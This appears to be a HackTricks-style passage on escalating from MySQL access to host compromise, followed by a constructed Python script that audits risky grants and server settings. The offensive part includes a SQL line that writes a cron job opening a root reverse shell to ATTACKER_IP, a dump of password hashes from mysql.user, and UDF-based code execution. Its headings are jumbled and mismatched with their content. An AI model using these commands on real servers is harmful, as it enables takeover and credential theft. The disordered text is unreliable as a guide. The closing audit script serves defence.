MySQL HackTricks Verified

Instructions on using LOAD_FILE() and INTO OUTFILE to read or write local files, which can lead to Remote Code Execution (RCE).

The holy grail is the FILE privilege, which allows reading and writing files on the OS.

If the MySQL server runs as root or SYSTEM on the operating system, and the database user has the FILE privilege, you can compile and inject a custom shared library (.so on Linux, .dll on Windows) to execute arbitrary system commands.

```sql
SHOW VARIABLES LIKE 'plugin_dir';
```

If local access is gained, extract credentials from files or via auxiliary/scanner/mysql/mysql_hashdump.

Host Spoofing:

Gaining access to the MySQL console as a low-privilege user is just the beginning. To compromise the host machine, you need to escalate your database privileges or break out of the DBMS sandbox.

Checking Current Privileges

Requires SUPER or SYSTEM_VARIABLES_ADMIN.

```sql
SELECT "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" INTO OUTFILE '/etc/cron.d/reverse';
SHOW VARIABLES LIKE 'plugin_dir';
```

On Windows, it is possible to achieve Remote Code Execution by writing binary data into the plugin directory to create a User-Defined Function (UDF).

Privilege Escalation: Verify current user permissions with:

```sql
-- On MySQL 5.7 and later the password column is named authentication_string.
SELECT user, password, create_priv, insert_priv, update_priv FROM mysql.user;
```

4. Configuration Security Audit
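An audit of the conditions this page depends on (global FILE, SUPER or SYSTEM_VARIABLES_ADMIN grants, unrestricted file export, a server running as root or SYSTEM), written as an added example that is not code from the original page. The function names, sample grants and variable values are constructed; secure_file_priv is the MySQL server variable that restricts LOAD_FILE() and INTO OUTFILE, it is not mentioned on the page, and paths are assumed to be POSIX-style.

```python
import posixpath
import re

# Global privileges the page names as escalation paths.
RISKY = {"FILE", "SUPER", "SYSTEM_VARIABLES_ADMIN"}
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<who>\S+)", re.I)

def risky_grants(grant_lines):
    """Map account -> sorted risky privileges found in SHOW GRANTS output."""
    found = {}
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue  # FILE and SUPER can only be granted globally
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        hits = set(RISKY) if privs & {"ALL", "ALL PRIVILEGES"} else privs & RISKY
        if hits:
            found.setdefault(m.group("who").rstrip(";"), set()).update(hits)
    return {who: sorted(p) for who, p in found.items()}

def config_findings(variables, os_user):
    """Flag server settings that turn a FILE grant into host file access."""
    out = []
    sfp = variables.get("secure_file_priv")  # None models SQL NULL (disabled)
    plugin_dir = posixpath.normpath(variables.get("plugin_dir", ""))
    if sfp == "":
        out.append("secure_file_priv empty: file read/write is not path-restricted")
    elif sfp is not None and (plugin_dir + "/").startswith(posixpath.normpath(sfp) + "/"):
        out.append("plugin_dir is inside secure_file_priv: UDF libraries can be written")
    if os_user in ("root", "SYSTEM"):
        out.append(f"mysqld runs as {os_user}: file access happens with full OS privileges")
    return out

# Constructed sample input (not from a real server).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'report'@'10.0.0.%'",
    "GRANT SELECT, FILE ON *.* TO 'etl'@'%'",
    "GRANT SYSTEM_VARIABLES_ADMIN ON *.* TO 'etl'@'%'",
    "GRANT ALL PRIVILEGES ON `shop`.* TO 'app'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]
SAMPLE_VARS = {"secure_file_priv": "", "plugin_dir": "/usr/lib/mysql/plugin/"}

if __name__ == "__main__":
    print(risky_grants(SAMPLE_GRANTS))
    print(config_findings(SAMPLE_VARS, "root"))
```

Setting secure_file_priv to NULL or to a dedicated directory outside plugin_dir, and running mysqld under an unprivileged account, clears the configuration findings.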
